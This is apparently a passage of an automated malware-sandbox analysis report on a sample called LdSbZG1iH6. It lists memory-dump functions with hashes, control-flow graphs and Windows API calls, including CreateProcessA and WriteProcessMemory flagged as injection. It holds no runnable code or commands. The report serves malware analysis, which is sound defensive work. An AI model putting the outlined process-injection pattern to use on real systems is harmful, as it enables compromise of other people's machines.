                                                                                                                                                • Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 66cae27aebb82045835b23a27df979e95d2fd277c5d49d5c7ed28c45f916f3fd
                                                                                                                                                • Instruction ID: f6a09ea6a2a6f98b21bc72e9381fea75199f93a562e2c67cbfc3cb295b4c359a
                                                                                                                                                • Opcode Fuzzy Hash: 66cae27aebb82045835b23a27df979e95d2fd277c5d49d5c7ed28c45f916f3fd
                                                                                                                                                • Instruction Fuzzy Hash: AFA1E4B5E05229CFDB14CFAAC8447EDBBF6BF8A301F109069E429AB251DB745985CF40
                                                                                                                                                Function 07A3D6FB Relevance: .2, Instructions: 238COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 6fe140d6ab0ae4c1eb0208e3cf9172bb2b27b1ed126b15c2c0112c737422f9a5
                                                                                                                                                • Instruction ID: 316a1c5653242e75101a6de1fda3f8d1512f265937f0807eaea1b206e72e9b0d
                                                                                                                                                • Opcode Fuzzy Hash: 6fe140d6ab0ae4c1eb0208e3cf9172bb2b27b1ed126b15c2c0112c737422f9a5
                                                                                                                                                • Instruction Fuzzy Hash: A6A1F7B5E05229CFDB14CFA5D8447EDBBF2BF8A301F1090A9E419AB251DB745985CF40
                                                                                                                                                Function 07A3DCFE Relevance: .2, Instructions: 216COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 267b5a6945b986220b6f42de1f26d7866434b4fb475d1387db9c85cea592d10f
                                                                                                                                                • Instruction ID: c6bdb5785ece9d713338741231852d3324931a9d62966fc5095d0e71cbdc8a44
                                                                                                                                                • Opcode Fuzzy Hash: 267b5a6945b986220b6f42de1f26d7866434b4fb475d1387db9c85cea592d10f
                                                                                                                                                • Instruction Fuzzy Hash: 0781D4B4E19218CFCB14DFA9C4846EDBBF5BF4A300F249156E429A7246D7349985CF50
                                                                                                                                                Function 07A3DC1B Relevance: .1, Instructions: 107COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 8844971667345cb36650d4158c81af18ea49688d4cc24d3f7adf351a8648febd
                                                                                                                                                • Instruction ID: b43e38f7a111f91686f0d355195ba9c8187f4a71b9140d8fcd164f03705f19d0
                                                                                                                                                • Opcode Fuzzy Hash: 8844971667345cb36650d4158c81af18ea49688d4cc24d3f7adf351a8648febd
                                                                                                                                                • Instruction Fuzzy Hash: E541B3B5E04618DFDB18DFAAD9406AEFBF6BF89300F14C16AE818A7255DB305941CF40
                                                                                                                                                Function 07A3DC28 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 25d454bff383af9c5ff64450ca5b7712d975839fe5e71e8c9f7d2e77263bea30
                                                                                                                                                • Instruction ID: 15a9e071104de6a1bc3176a8b5dfa99b24c0cdfa166509cd5c78348aa43cdecf
                                                                                                                                                • Opcode Fuzzy Hash: 25d454bff383af9c5ff64450ca5b7712d975839fe5e71e8c9f7d2e77263bea30
                                                                                                                                                • Instruction Fuzzy Hash: 223182B5E046188BEB18CFABD94469EFAF7BFC9300F14C16AD818A7265EB345941CF50
                                                                                                                                                Function 059BB13A Relevance: .0, Instructions: 16COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: de8e8e8ebb534afafcaca03800c8b94157d872134c9a0517154a5b492404ae7a
                                                                                                                                                • Instruction ID: 0c988866ba575614a0abbb1c32bb41eca3c17b8532e4986227021156e1faad42
                                                                                                                                                • Opcode Fuzzy Hash: de8e8e8ebb534afafcaca03800c8b94157d872134c9a0517154a5b492404ae7a
                                                                                                                                                • Instruction Fuzzy Hash: FAC09226E9E008D3B910DC84AA112FCE33FC2CF13AE013C62965EB309241D19A290289
                                                                                                                                                Function 00F8D0B1 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 466 f8d0b1-f8d14f GetCurrentProcess 471 f8d158-f8d18c GetCurrentThread 466->471 472 f8d151-f8d157 466->472 473 f8d18e-f8d194 471->473 474 f8d195-f8d1c9 GetCurrentProcess 471->474 472->471 473->474 476 f8d1cb-f8d1d1 474->476 477 f8d1d2-f8d1ed call f8d699 474->477 476->477 480 f8d1f3-f8d222 GetCurrentThreadId 477->480 481 f8d22b-f8d28d 480->481 482 f8d224-f8d22a 480->482 482->481
                                                                                                                                                APIs
                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00F8D13E
                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00F8D17B
                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00F8D1B8
                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00F8D211
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1986723074.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f80000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                • Opcode ID: 1e3a5dce87a6ee9bcb1f60b8c661b4c8f5468b0cbc957b554a40ab281dda1e5a
                                                                                                                                                • Instruction ID: 416c324c506440755335b9b09a6ab09efcd3baa3568c2679b3fce27495491fcb
                                                                                                                                                • Opcode Fuzzy Hash: 1e3a5dce87a6ee9bcb1f60b8c661b4c8f5468b0cbc957b554a40ab281dda1e5a
                                                                                                                                                • Instruction Fuzzy Hash: 0C5163B09007098FDB04DFA9D948BDEBBF1AF88314F208459E419A73A0DB749984CF69
                                                                                                                                                Function 00F8D0C0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 489 f8d0c0-f8d14f GetCurrentProcess 493 f8d158-f8d18c GetCurrentThread 489->493 494 f8d151-f8d157 489->494 495 f8d18e-f8d194 493->495 496 f8d195-f8d1c9 GetCurrentProcess 493->496 494->493 495->496 498 f8d1cb-f8d1d1 496->498 499 f8d1d2-f8d1ed call f8d699 496->499 498->499 502 f8d1f3-f8d222 GetCurrentThreadId 499->502 503 f8d22b-f8d28d 502->503 504 f8d224-f8d22a 502->504 504->503
                                                                                                                                                APIs
                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00F8D13E
                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00F8D17B
                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00F8D1B8
                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00F8D211
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1986723074.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f80000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                • Opcode ID: ab44ccd2cce290940a4d768ec3f2b5a241d8ea541c867e4fc01085fd610d4919
                                                                                                                                                • Instruction ID: deb1909466329b257781f50a76e342afbc2d3a965a3ef87e7fc5ca27711ebfc2
                                                                                                                                                • Opcode Fuzzy Hash: ab44ccd2cce290940a4d768ec3f2b5a241d8ea541c867e4fc01085fd610d4919
                                                                                                                                                • Instruction Fuzzy Hash: 165164B0D003098FDB04DFA9D948BDEBBF1AF88314F208559E419A73A0D7749884CF65
                                                                                                                                                Function 059B7859 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 601 59b7859-59b78f5 604 59b792e-59b794e 601->604 605 59b78f7-59b7901 601->605 610 59b7950-59b795a 604->610 611 59b7987-59b79b6 604->611 605->604 606 59b7903-59b7905 605->606 608 59b7928-59b792b 606->608 609 59b7907-59b7911 606->609 608->604 612 59b7913 609->612 613 59b7915-59b7924 609->613 610->611 614 59b795c-59b795e 610->614 621 59b79b8-59b79c2 611->621 622 59b79ef-59b7aa9 CreateProcessA 611->622 612->613 613->613 615 59b7926 613->615 616 59b7981-59b7984 614->616 617 59b7960-59b796a 614->617 615->608 616->611 619 59b796e-59b797d 617->619 620 59b796c 617->620 619->619 623 59b797f 619->623 620->619 621->622 624 59b79c4-59b79c6 621->624 633 59b7aab-59b7ab1 622->633 634 59b7ab2-59b7b38 622->634 623->616 625 59b79e9-59b79ec 624->625 626 59b79c8-59b79d2 624->626 625->622 628 59b79d6-59b79e5 626->628 629 59b79d4 626->629 628->628 630 59b79e7 628->630 629->628 630->625 633->634 644 59b7b3a-59b7b3e 634->644 645 59b7b48-59b7b4c 634->645 644->645 646 59b7b40 644->646 647 59b7b4e-59b7b52 645->647 648 59b7b5c-59b7b60 645->648 646->645 647->648 649 59b7b54 647->649 650 59b7b62-59b7b66 648->650 651 59b7b70-59b7b74 648->651 649->648 650->651 652 59b7b68 650->652 653 59b7b86-59b7b8d 651->653 654 59b7b76-59b7b7c 651->654 652->651 655 59b7b8f-59b7b9e 653->655 656 59b7ba4 653->656 654->653 655->656 658 59b7ba5 656->658 658->658
                                                                                                                                                APIs
                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 059B7A96
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                • Opcode ID: e75718302f983012804303a12db165ffa794522a2ff371c2bd310eeb91a44d2f
                                                                                                                                                • Instruction ID: 27c82aa088e4efea5e2115e5a2034412656ef6903833cbc7482860b3f61da4cb
                                                                                                                                                • Opcode Fuzzy Hash: e75718302f983012804303a12db165ffa794522a2ff371c2bd310eeb91a44d2f
                                                                                                                                                • Instruction Fuzzy Hash: 1A917E71D00219DFEB10DFA8C941BEDBBB6FF84314F1482AAD849A7250DBB49985CF91
                                                                                                                                                Function 059B7860 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 659 59b7860-59b78f5 661 59b792e-59b794e 659->661 662 59b78f7-59b7901 659->662 667 59b7950-59b795a 661->667 668 59b7987-59b79b6 661->668 662->661 663 59b7903-59b7905 662->663 665 59b7928-59b792b 663->665 666 59b7907-59b7911 663->666 665->661 669 59b7913 666->669 670 59b7915-59b7924 666->670 667->668 671 59b795c-59b795e 667->671 678 59b79b8-59b79c2 668->678 679 59b79ef-59b7aa9 CreateProcessA 668->679 669->670 670->670 672 59b7926 670->672 673 59b7981-59b7984 671->673 674 59b7960-59b796a 671->674 672->665 673->668 676 59b796e-59b797d 674->676 677 59b796c 674->677 676->676 680 59b797f 676->680 677->676 678->679 681 59b79c4-59b79c6 678->681 690 59b7aab-59b7ab1 679->690 691 59b7ab2-59b7b38 679->691 680->673 682 59b79e9-59b79ec 681->682 683 59b79c8-59b79d2 681->683 682->679 685 59b79d6-59b79e5 683->685 686 59b79d4 683->686 685->685 687 59b79e7 685->687 686->685 687->682 690->691 701 59b7b3a-59b7b3e 691->701 702 59b7b48-59b7b4c 691->702 701->702 703 59b7b40 701->703 704 59b7b4e-59b7b52 702->704 705 59b7b5c-59b7b60 702->705 703->702 704->705 706 59b7b54 704->706 707 59b7b62-59b7b66 705->707 708 59b7b70-59b7b74 705->708 706->705 707->708 709 59b7b68 707->709 710 59b7b86-59b7b8d 708->710 711 59b7b76-59b7b7c 708->711 709->708 712 59b7b8f-59b7b9e 710->712 713 59b7ba4 710->713 711->710 712->713 715 59b7ba5 713->715 715->715
                                                                                                                                                APIs
                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 059B7A96
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                • Opcode ID: edd73f92fd3668ea9571f18f12024d2e0c894e01236803e423ab128aac90d33d
                                                                                                                                                • Instruction ID: 7608bff0e19a7fa9f8ed78b74b6df250a8db8c039e2d7594887498feaa602e0f
                                                                                                                                                • Opcode Fuzzy Hash: edd73f92fd3668ea9571f18f12024d2e0c894e01236803e423ab128aac90d33d
                                                                                                                                                • Instruction Fuzzy Hash: 2C916E71D00219DFEB24DFA8C941BEDBBB6FF84314F1482A9D849A7240DBB49985CF91
                                                                                                                                                Function 00F8AE28 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 716 f8ae28-f8ae37 717 f8ae39-f8ae46 call f8a14c 716->717 718 f8ae63-f8ae67 716->718 724 f8ae48 717->724 725 f8ae5c 717->725 720 f8ae69-f8ae73 718->720 721 f8ae7b-f8aebc 718->721 720->721 727 f8aec9-f8aed7 721->727 728 f8aebe-f8aec6 721->728 773 f8ae4e call f8b0c0 724->773 774 f8ae4e call f8b0b0 724->774 725->718 729 f8aed9-f8aede 727->729 730 f8aefb-f8aefd 727->730 728->727 732 f8aee9 729->732 733 f8aee0-f8aee7 call f8a158 729->733 735 f8af00-f8af07 730->735 731 f8ae54-f8ae56 731->725 734 f8af98-f8afaf 731->734 737 f8aeeb-f8aef9 732->737 733->737 749 f8afb1-f8b010 734->749 738 f8af09-f8af11 735->738 739 f8af14-f8af1b 735->739 737->735 738->739 740 f8af28-f8af31 call f8a168 739->740 741 f8af1d-f8af25 739->741 747 f8af3e-f8af43 740->747 748 f8af33-f8af3b 740->748 741->740 750 f8af61-f8af6e 747->750 751 f8af45-f8af4c 747->751 748->747 767 f8b012-f8b058 749->767 758 f8af70-f8af8e 750->758 759 f8af91-f8af97 750->759 751->750 752 f8af4e-f8af5e call f8a178 call f8a188 751->752 752->750 758->759 768 f8b05a-f8b05d 767->768 769 f8b060-f8b08b GetModuleHandleW 767->769 768->769 770 f8b08d-f8b093 769->770 771 f8b094-f8b0a8 769->771 770->771 773->731 774->731
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00F8B07E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1986723074.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f80000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                • Opcode ID: 9b51c9edd8f4cc339fd59a7e5827005eb89d36e8f096ca3f6ac0f40a95e5762b
                                                                                                                                                • Instruction ID: 7cad79d27fd48f55ba97e2b8795d1297c8b9bb09f03c7ef3ab9a8f160c8f1e23
                                                                                                                                                • Opcode Fuzzy Hash: 9b51c9edd8f4cc339fd59a7e5827005eb89d36e8f096ca3f6ac0f40a95e5762b
                                                                                                                                                • Instruction Fuzzy Hash: D57146B0A00B058FE724EF2AD45579ABBF1FF88310F108A2EE486D7A50D775E945CB91
                                                                                                                                                Function 00F844B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 775 f844b0-f859d9 CreateActCtxA 778 f859db-f859e1 775->778 779 f859e2-f85a3c 775->779 778->779 786 f85a4b-f85a4f 779->786 787 f85a3e-f85a41 779->787 788 f85a60 786->788 789 f85a51-f85a5d 786->789 787->786 791 f85a61 788->791 789->788 791->791
                                                                                                                                                APIs
                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00F859C9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1986723074.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f80000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Create
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                • Opcode ID: cc347eb29623da81282ac25f57fce28ee74f519bae1d1c00ebde1bcd296da2a7
                                                                                                                                                • Instruction ID: cb32992cb0dfc0bee15204cf33d5578eda4d527ddf2d87053fa8651490aede39
                                                                                                                                                • Opcode Fuzzy Hash: cc347eb29623da81282ac25f57fce28ee74f519bae1d1c00ebde1bcd296da2a7
                                                                                                                                                • Instruction Fuzzy Hash: D941F2B0C00619CBDB24DFA9C8847DEBBB5BF48704F20816AD408AB255DBB5A985CF90
                                                                                                                                                Function 00F8590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 792 f8590c-f85913 793 f8591c-f859d9 CreateActCtxA 792->793 795 f859db-f859e1 793->795 796 f859e2-f85a3c 793->796 795->796 803 f85a4b-f85a4f 796->803 804 f85a3e-f85a41 796->804 805 f85a60 803->805 806 f85a51-f85a5d 803->806 804->803 808 f85a61 805->808 806->805 808->808
                                                                                                                                                APIs
                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00F859C9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1986723074.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f80000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Create
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                • Opcode ID: 78fb7f71a16e944c7826f82f1938911804a4629fd21ea933711760eb61793939
                                                                                                                                                • Instruction ID: d30232eb1dbe1fc527c9b0afbfbccc7a1e12c93a30254b855f5e81666f3cbf00
                                                                                                                                                • Opcode Fuzzy Hash: 78fb7f71a16e944c7826f82f1938911804a4629fd21ea933711760eb61793939
                                                                                                                                                • Instruction Fuzzy Hash: 6B41F2B1C00619CBDB24DFA9C8847CDBBB5BF48314F24846AD408AB255DBB59985CF90
                                                                                                                                                Function 07A33F90 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 809 7a33f90-7a33fe4 811 7a33fe6-7a33fec 809->811 812 7a33fef-7a33ffe 809->812 811->812 813 7a34003-7a3403c DrawTextExW 812->813 814 7a34000 812->814 815 7a34045-7a34062 813->815 816 7a3403e-7a34044 813->816 814->813 816->815
                                                                                                                                                APIs
                                                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07A3402F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DrawText
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2175133113-0
                                                                                                                                                • Opcode ID: eb10962a326b2e4942565129a611c9be3f7081fb9e1802c5e2809fdb95976493
                                                                                                                                                • Instruction ID: d8f6a074bc2ce325e5f171206b37a0e23a6f66740d86e8ca6a22fd3b60336643
                                                                                                                                                • Opcode Fuzzy Hash: eb10962a326b2e4942565129a611c9be3f7081fb9e1802c5e2809fdb95976493
                                                                                                                                                • Instruction Fuzzy Hash: 9331E2B59002499FDB10CFAAD884AEEFBF4FB48320F14842AE819A7210D775A545CFA0
                                                                                                                                                Function 07A33F98 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 840 7a33f98-7a33fe4 841 7a33fe6-7a33fec 840->841 842 7a33fef-7a33ffe 840->842 841->842 843 7a34003-7a3403c DrawTextExW 842->843 844 7a34000 842->844 845 7a34045-7a34062 843->845 846 7a3403e-7a34044 843->846 844->843 846->845
                                                                                                                                                APIs
                                                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07A3402F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DrawText
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2175133113-0
                                                                                                                                                • Opcode ID: 6b844c93dcb0b6e26785c1e0299e59c79ade123d781dc214f1e325505e27f5b3
                                                                                                                                                • Instruction ID: 95a92906f12e1281463ec2e7a11f609e0a7b1636a1cb64ef716a38f61a6aa4cd
                                                                                                                                                • Opcode Fuzzy Hash: 6b844c93dcb0b6e26785c1e0299e59c79ade123d781dc214f1e325505e27f5b3
                                                                                                                                                • Instruction Fuzzy Hash: C821A0B59002499FDB10CF9AD884AAEFBF5FB48320F54842AE919A7210D775A944CFA4
                                                                                                                                                Function 059B7199 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 819 59b7199-59b71ee 822 59b71fe-59b723d WriteProcessMemory 819->822 823 59b71f0-59b71fc 819->823 825 59b723f-59b7245 822->825 826 59b7246-59b7276 822->826 823->822 825->826
                                                                                                                                                APIs
                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 059B7230
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                • Opcode ID: d08424533730f3832e0d63582e81a8574e6bdf3c98650070838d89690a1ff754
                                                                                                                                                • Instruction ID: b92cfbc22d42ec020e9dd61857c63722b0bc5687a56d3a144b25fc7fc1e42974
                                                                                                                                                • Opcode Fuzzy Hash: d08424533730f3832e0d63582e81a8574e6bdf3c98650070838d89690a1ff754
                                                                                                                                                • Instruction Fuzzy Hash: EE2126B5900259CFDB10CFA9C9807DEBBF1FF88310F10842AE959A7250C7789944CFA5
                                                                                                                                                Function 059B71A0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 830 59b71a0-59b71ee 832 59b71fe-59b723d WriteProcessMemory 830->832 833 59b71f0-59b71fc 830->833 835 59b723f-59b7245 832->835 836 59b7246-59b7276 832->836 833->832 835->836
                                                                                                                                                APIs
                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 059B7230
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                • Opcode ID: b29ce6f8dd7de8f6011f3deb88fa101d5e9e42e2d77233c205b3f5f68814e19b
                                                                                                                                                • Instruction ID: 307fd1b2794c7f221bd3bb81c66d54e2e9b9271aaa8a30ffe6501e064215ff85
                                                                                                                                                • Opcode Fuzzy Hash: b29ce6f8dd7de8f6011f3deb88fa101d5e9e42e2d77233c205b3f5f68814e19b
                                                                                                                                                • Instruction Fuzzy Hash: 3B2127B19003599FDB10CFA9C985BDEBBF5FF88310F10842AE959A7250C778A944CBA4
                                                                                                                                                Function 059BBCCA Relevance: 1.6, APIs: 1, Instructions: 67windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 059BBC95
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessagePost
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                • Opcode ID: c51acd8951cad31e7a6504537a8f6dcd3f068e9dfe869f276136f4df4065a66c
                                                                                                                                                • Instruction ID: 2c6d39be9a3f3ff144b80bf40e49d1c26ea26ad9525c21413ac9b28acfb699f9
                                                                                                                                                • Opcode Fuzzy Hash: c51acd8951cad31e7a6504537a8f6dcd3f068e9dfe869f276136f4df4065a66c
                                                                                                                                                • Instruction Fuzzy Hash: 2F210871905258CFEB21DF65D5147EEBFF5AF85304F248459C441BB281CB7D5804CBA1
